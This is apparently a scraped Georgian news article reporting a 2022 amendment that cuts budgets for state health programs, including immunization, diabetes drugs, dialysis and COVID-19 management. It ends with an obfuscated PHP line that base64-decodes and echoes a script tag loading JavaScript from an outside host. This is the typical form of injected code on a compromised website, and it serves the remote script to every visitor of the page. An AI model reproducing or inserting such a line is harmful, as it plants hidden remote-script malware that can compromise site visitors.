celsiusi
ავერსი შნაიდერი
„2022 წლის ჯანმრთელობის დაცვის სახელმწიფო პროგრამების დამტკიცების შესახებ“ საქართველოს მთავრობის 2022 წლის 12 იანვრის №4 დადგენილებაში ცვლილება შევიდა. საკანონმდებლო მაცნეში გამოქვეყნებული ინფორმაციის თანახმად, ჯანმრთელობის დაცვის რამდენიმე სახელმწიფო პროგრამის ბიუჯეტი მცირდება. 
 
დოკუმენტის მიხედვით, თითქმის 21 000 ლარით მცირდება „იმუნიზაციის“ პროგრამისთვის გამოყოფილი თანხა. ნაცვლად 50 000 ლარისა, იმუნიზაციის პროგრამაზე ახლა 29 223 ლარი დაიხარჯება. 10 000 ლარით არის შემცირებული როგორც ვაქცინებისა და ასაცრელი მასალების შეძენისთვის გამოყოფილი თანხა, ასევე კოვიდ-19-ის საწინააღმდეგო ვაქცინით აცრების ადმინისტრირება.
 
შემცირებას დაექვემდებარა „დიაბეტის მართვის“ პროგრამაც. 27 000 ლარის ნაცვლად, პროგრამის ბიუჯეტი 19 989 ლარით განისაზღვრა. ამ პროგრამაში ძირითადი ცვლილება შაქრიანი დიაბეტით დაავადებულ პაციენტთა მედიკამენტებით უზრუნველყოფის ნაწილს შეეხო, რაზეც 18 000-ის ნაცვლად, 11 643 ლარი დაიხარჯება.
 
რაც შეეხება „დიალიზისა და თირკმლის ტრანსპლანტაციის“ სახელმწიფო პროგრამას, მისი ბიუჯეტი 6 000 ლარით შემცირდა და 47 119 ლარი შეადგინა. უფრო კონკრეტულად, თანხები ზემო და პერიტონიული დიალიზისათვის საჭირო სადიალიზე საშუალებების, მასალისა და მედიკამენტების შესყიდვასა და მიწოდების ნაწილში დაიზოგება.
 
ცვლილებები განხორციელდა „ახალი კორონავირუსული დაავადების COVID-19-ის მართვის“ პროგრამაშიც. კერძოდ, 450 000 ლარის ნაცვლად, მისი განხორციელებისთვის 444 918 ლარი დაიხარჯება.
 
 
 
BMG 
528
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");